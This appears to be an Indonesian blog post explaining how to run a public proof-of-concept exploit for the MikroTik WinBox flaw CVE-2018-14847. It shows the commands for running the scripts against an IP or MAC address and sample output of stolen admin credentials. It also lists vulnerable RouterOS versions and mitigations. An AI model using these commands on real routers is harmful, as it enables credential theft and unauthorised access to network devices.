Minggu, 02 Agustus 2020

Cara Menggunaka WinboxPoC

No comments
Tool ini  Memanfaatkan kerentanan dan membaca kata sandi. 

WinboxExploit

Ini adalah bukti konsep kerentanan WinBox yang kritis (CVE-2018-14847) yang memungkinkan pembacaan file sewenang-wenang terhadap kata sandi teks biasa.


Persyaratan

  • Python 3+

Skrip ini TIDAK akan berjalan dengan Python 2.x atau lebih rendah.

Cara Penggunaan

Script sederhana digunakan dengan argumen sederhana di commandline.

WinBox (TCP / IP)

Memanfaatkan kerentanan dan membaca kata sandi.

python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Contoh:

$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

Server MAC WinBox (Layer 2)

Anda dapat mengekstrak file meskipun perangkat tidak memiliki alamat IP.

Pemeriksaan penemuan sederhana untuk perangkat Mikrotik yang terhubung secara lokal.

python3 MACServerDiscover.py

Contoh:

$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Memanfaatkan kerentanan dan membaca kata sandi.

python3 MACServerExploit.py <MAC-ADDRESS>

Contoh:

$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versi Rentan

Semua versi RouterOS dari 2015-05-28 hingga 2018-04-20 rentan terhadap eksploitasi ini.

Perangkat Mikrotik yang menjalankan versi RouterOS:

  • Jangka panjang: 6.30.1 - 6.40.7
  • Stabil: 6,29 - 6,42
  • Beta: 6.29rc1 - 6.43rc3

Untuk informasi lebih lanjut, lihat: https://blog.mikrotik.com/security/winbox-vulnerability.html

Teknik Mitigasi

  • Tingkatkan perute ke versi RouterOS yang menyertakan perbaikan.
  • Nonaktifkan layanan WinBox di router.
  • Anda dapat membatasi akses ke layanan WinBox ke alamat IP tertentu dengan yang berikut ini:
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Anda dapat menggunakan beberapa Aturan Filter (ACL) untuk menolak akses eksternal ke layanan WinBox:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Membatasi akses ke layanan mac-winbox dapat dilakukan dengan menentukan antarmuka yang diizinkan:

/tool mac-server mac-winbox

0 komentar:

Posting Komentar